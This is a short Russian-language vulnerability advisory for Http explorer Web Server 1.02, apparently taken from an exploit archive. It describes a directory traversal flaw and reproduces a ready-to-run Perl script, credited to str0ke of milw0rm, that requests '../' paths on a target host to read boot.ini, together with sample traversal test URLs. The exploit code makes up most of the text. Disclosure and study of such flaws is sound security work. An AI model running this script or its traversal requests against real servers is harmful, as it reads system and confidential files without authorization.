Программа: Http explorer Web Server 1.02
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки, в Web сервере, приводящей к возможности использования спцификаторов обхода директорий для получения содержимого произвольных файлов.
Пример:
# Http explorer Web Server 1.02 Directory Transversal Vulnerability
# http://sourceforge.net/projects/http-explorer/
# Test: http://[site]/../../../../ || http://[site]/../
# /str0ke
use LWP::Simple;
use strict;
sub usage
{
print "Http explorer Web Server 1.02 Directory Transversal Vulnerability\n";
print "str0ke (milw0rm.com)\n";
print "Usage: $0 www.example.com\n";
exit ();
}
my $host= shift || &usage;
getprint "http://" . $host . "/../../../../../../../../boot.ini";